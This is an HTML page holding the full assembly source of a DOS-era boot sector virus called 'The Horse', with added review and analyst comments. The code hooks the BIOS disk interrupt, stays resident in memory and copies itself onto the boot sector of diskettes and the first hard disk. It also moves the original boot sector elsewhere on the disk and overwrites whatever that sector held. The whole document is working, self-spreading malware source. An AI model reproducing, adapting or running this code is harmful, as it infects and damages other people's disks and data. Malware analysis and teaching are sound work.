📄 boothors病毒源程序.htm
<font size="3"></font><b><font size="3">BOOTHORS病毒源程序 </font></b></div>
<p align="left">
;<br>
; The Horse's boot sector virus<br>
; This is an author's source<br>
;<br>
<br>
<br>
<br>
; Image header: a jump over a data area laid out like a DOS boot sector header,<br>
; followed by the code at start.<br>
; .radix 16 makes unsuffixed numeric literals hexadecimal (7c00, 413, 13*4, ...).<br>
; NOTE(review): offsets are adjusted by -100 throughout the listing, so it was<br>
; presumably assembled with a 100h origin -- confirm against the build.<br>
.radix 16<br>
begin:<br>
jmp start<br>
<br>
; my .. lee bracket the header bytes. The move routine overwrites this range<br>
; with the same range taken from the sector buffer at +200, so a written copy<br>
; carries the header of the disk it lands on rather than the values below.<br>
my label word<br>
<br>
; NOTE(review): the fields below look like an OEM name followed by a BIOS<br>
; parameter block for a 9-sector, 2-head diskette (200h bytes/sector, 2d0h total<br>
; sectors, media byte 0FDh) -- field meanings are inferred from layout, confirm.<br>
db 'IBM 3.3'<br>
dw 200<br>
db 2<br>
dw 1<br>
db 2<br>
dw 70<br>
dw 2d0<br>
db 0fdh<br>
dw 2<br>
dw 9<br>
dw 2<br>
dw 0<br>
<br>
lee label word<br>
<br>
; Byte length of the whole image (begin .. endcode); used as the copy count<br>
; when the code at start relocates itself.<br>
virlen equ offset endcode-begin<br>
<br>
; start: boot-time entry, running from the boot sector loaded at 0:7C00.<br>
; Sets up a stack, saves the INT 13h vector, reserves the top 1 KB of base<br>
; memory, hooks INT 13h into it, copies the image there and continues at here.<br>
; Analyst note: afterwards the word at 0:0413 is one less than before and the<br>
; INT 13h vector points into the reclaimed top-of-memory KB; both are observable.<br>
start:<br>
cld<br>
sub ax,ax<br>
mov ds,ax<br>
mov bp,7c00<br>
; Stack at 0:7C00, growing down below the loaded sector.<br>
cli<br>
mov ss,ax<br>
mov sp,bp<br>
sti<br>
; Push 0000:7C00 as a far return address; the retf at exit consumes it to<br>
; hand control to whatever sector has been read back to 0:7C00 by then.<br>
push ax<br>
push bp<br>
; 0:0413 is the BIOS data area word holding base memory size in KB.<br>
mov ax,[413]<br>
; Save the current INT 13h vector (offset at 13*4, segment at 13*4+2) into<br>
; old13h of the copy still located at 0:7C00.<br>
push [13*4+2]<br>
push [13*4]<br>
pop word ptr [old13h+7c00-100]<br>
pop word ptr [old13h+7c00-100+2]<br>
; Report 1 KB less base memory so the resident copy is left alone.<br>
dec ax<br>
mov [413],ax<br>
; KB count * 40h = paragraph (segment) address of the reserved top KB.<br>
mov cl,6<br>
shl ax,cl<br>
mov es,ax<br>
<br>
; Point INT 13h at int13h inside the reserved segment.<br>
mov [13*4],offset int13h-100<br>
mov [13*4+2],es<br>
<br>
; Copy virlen bytes from 0:7C00 (ds:si) to es:0 (reserved segment).<br>
mov cx,virlen<br>
sub di,di<br>
mov si,bp<br>
rep movsb<br>
; Far return used as a jump: continue at here inside the relocated copy.<br>
push es<br>
mov ax,offset here-begin<br>
push ax<br>
retf<br>
; here: runs in the relocated copy. Reloads the displaced original sector to<br>
; 0:7C00 and, when this copy came from a diskette, also handles the first hard<br>
; disk's sector 1. INT 13h register use: AH=function (02 read, 03 write),<br>
; AL=sector count, CH=cylinder, CL=sector, DH=head, DL=drive, ES:BX=buffer.<br>
; Analyst note: the stash locations visible below (hard disk cylinder 0, head 0,<br>
; sector 7; diskette cylinder 27h, head 1, sector 9) are where a displaced<br>
; original sector would be found on affected media.<br>
here:<br>
; AH=0: disk reset through INT 13h, with es set to 0 for the read that follows.<br>
sub ax,ax<br>
mov es,ax<br>
int 13<br>
; Prepare a 1-sector read into 0:7C00.<br>
mov ax,0201<br>
mov bx,bp<br>
; ident is 0FDh in a diskette copy; the hard-disk copy is written with 0F8h.<br>
cmp byte ptr cs:[ident-100],0fdh<br>
je from_disk<br>
; Hard-disk copy: read the stashed sector from drive 80h, cylinder 0, head 0,<br>
; sector 7 to 0:7C00, then leave.<br>
mov cx,0007<br>
mov dx,0080<br>
int 13<br>
jmp exit<br>
<br>
from_disk:<br>
<br>
; Diskette copy: read the stashed sector from drive 0, cylinder 27h, head 1,<br>
; sector 9 to 0:7C00.<br>
mov cx,2709<br>
mov dx,0100<br>
int 13<br>
jc exit<br>
; ds = es = resident segment for the buffer work below.<br>
push cs<br>
push cs<br>
pop es<br>
pop ds<br>
; Read drive 80h, cylinder 0, head 0, sector 1 into the buffer at offset 200.<br>
mov ax,0201<br>
mov bx,0200<br>
mov cx,0001<br>
mov dx,0080<br>
int 13<br>
jc exit<br>
; inf? compares the resident code with the buffer; ZF set means already present.<br>
call inf?<br>
je exit<br>
; Mark the image as the hard-disk variant before it is written.<br>
mov byte ptr [ident-100],0f8<br>
; Stash the sector just read at cylinder 0, head 0, sector 7 of drive 80h.<br>
mov ax,0301<br>
mov bx,0200<br>
mov cx,0007<br>
mov dx,0080<br>
int 13<br>
jc exit<br>
; Merge the header and tail areas of the buffered sector into the image.<br>
call move<br>
; Write the image (es:0) to cylinder 0, sector 1. dx is not reloaded here; the<br>
; code relies on it still holding 0080 after the previous INT 13h call.<br>
mov ax,0301<br>
sub bx,bx<br>
mov cx,0001<br>
int 13<br>
exit:<br>
; Reset the in-memory ident to the diskette value, then far-return to the<br>
; 0000:7C00 address pushed at start.<br>
mov byte ptr cs:[ident-100],0fdh<br>
retf<br>
; int13h: resident INT 13h hook. Filters for read/write requests (AH=2 or 3) on<br>
; drives 0 and 1, calls infect when the target drive's motor is flagged off,<br>
; then always chains to the saved original handler with ax and ds restored.<br>
int13h:<br>
push ds<br>
push ax<br>
; Only drives 0 and 1 are of interest.<br>
cmp dl,1<br>
ja skip<br>
; Only functions 2 (read) and 3 (write).<br>
cmp ah,2<br>
jb skip<br>
cmp ah,3<br>
ja skip<br>
; 0:043F is the BIOS diskette motor status byte; bits 0 and 1 flag a running<br>
; motor for drives 0 and 1.<br>
sub ax,ax<br>
mov ds,ax<br>
mov al,[43f]<br>
push dx<br>
; dl+1 turns drive number 0/1 into the matching motor bit mask 1/2.<br>
and ax,3<br>
and dx,3<br>
inc dl<br>
test al,dl<br>
; pop does not alter flags, so jne still reflects the test above.<br>
pop dx<br>
; Motor already running for this drive: pass the request through untouched.<br>
jne skip<br>
call infect<br>
skip:<br>
pop ax<br>
pop ds<br>
do:<br>
; Chain to the INT 13h handler saved in old13h. ojoj also calls this label.<br>
jmp dword ptr cs:[old13h-100]<br>
<br>
; infected?: resets the disk, reads cylinder 0, head 0, sector 1 of drive dl<br>
; into the buffer at offset 200, then falls through to inf?.<br>
; The caller (infect) has already set ds = es = cs.<br>
infected?:<br>
<br>
; AH=0: disk reset via the original handler.<br>
sub ax,ax<br>
call ojoj<br>
; AH=2, AL=1: read one sector; CX=0001 and DH=0 select cylinder 0, head 0,<br>
; sector 1; DL is the caller's drive.<br>
mov ax,0201<br>
mov bx,0200<br>
mov cx,0001<br>
sub dh,dh<br>
call ojoj<br>
; inf?: compare the resident code (start .. mbyte) with the same range of the<br>
; buffered sector. The range stops before old13h and ident, which vary.<br>
; Returns ZF set when every byte matched.<br>
inf?:<br>
mov si,offset start-100<br>
mov di,offset start-100+200<br>
mov cx,mbyte-start<br>
; rep on cmpsb repeats while the bytes are equal.<br>
rep cmpsb<br>
return:<br>
ret<br>
; infect: called from the INT 13h hook with dl = diskette drive. Saves the<br>
; registers it uses, checks sector 1 of the diskette, and if the resident code<br>
; is not already there stashes that sector and writes the image in its place.<br>
; Analyst note: the stash write goes to cylinder 27h, head 1, sector 9 with no<br>
; check of what that sector holds, so its prior contents are overwritten.<br>
; With the geometry given in this file's header data (2d0h sectors, 9 per<br>
; track, 2 heads) that is the last sector of the disk.<br>
infect:<br>
push bx<br>
push cx<br>
push dx<br>
push si<br>
push di<br>
push es<br>
; ds = es = resident segment.<br>
push cs<br>
push cs<br>
pop es<br>
pop ds<br>
cld<br>
; ZF set on return means sector 1 already matches the resident code.<br>
call infected?<br>
je leave<br>
; Write the buffered original sector to cylinder 27h, head 1, sector 9.<br>
mov ax,0301<br>
mov bx,0200<br>
mov cx,2709<br>
mov dh,1<br>
call ojoj<br>
; Carry set (write failed): leave sector 1 untouched.<br>
jc leave<br>
; Merge header and tail areas from the buffered sector into the image.<br>
call move<br>
; Write the image (es:0) to cylinder 0, head 0, sector 1.<br>
mov ax,0301<br>
sub bx,bx<br>
mov cx,0001<br>
sub dh,dh<br>
call ojoj<br>
leave:<br>
pop es<br>
pop di<br>
pop si<br>
pop dx<br>
pop cx<br>
pop bx<br>
ret<br>
<br>
; ojoj: invoke the saved original INT 13h handler directly, without going<br>
; through the hooked vector. pushf + push cs + near call build the same<br>
; flags/cs/ip frame an int instruction would, so the handler's iret returns here.<br>
ojoj:<br>
pushf<br>
push cs<br>
call do<br>
ret<br>
; move: copy two ranges from the buffered sector (at +200) into the resident<br>
; image: the header area my .. lee and the tail area usm .. endcode.<br>
; Expects ds = es = resident segment and the direction flag clear; both are<br>
; set up by the callers visible in this file.<br>
move:<br>
; Header area (my .. lee).<br>
mov di,offset my-100<br>
mov si,offset my-100+200<br>
mov cx,lee-my<br>
rep movsb<br>
; Tail area (usm .. endcode).<br>
mov di,offset usm-100<br>
mov si,offset usm-100+200<br>
mov cx,endcode-usm<br>
rep movsb<br>
ret<br>
<br>
<br>
; Data area. mbyte marks the end of the range that inf? compares.<br>
mbyte label word<br>
<br>
; Saved original INT 13h vector (offset, then segment), filled in at start.<br>
old13h dd ?<br>
; Origin marker: 0FDh in a diskette copy; set to 0F8h before the image is<br>
; written to the hard disk, and reset to 0FDh in memory at exit.<br>
ident db 0fdh<br>
<br>
; usm .. endcode is the tail range that move refreshes from the buffered sector.<br>
usm label word<br>
<br>
; NOTE(review): uninitialised filler before the signature bytes; how the count<br>
; 135d is read depends on the assembler's handling of the d suffix under<br>
; .radix 16 -- confirm.<br>
db 135d dup (?)<br>
<br>
; Bytes 55h, AAh, the boot sector signature.<br>
db 55,0AA<br>
<br>
endcode label word <br>
<br>
<br>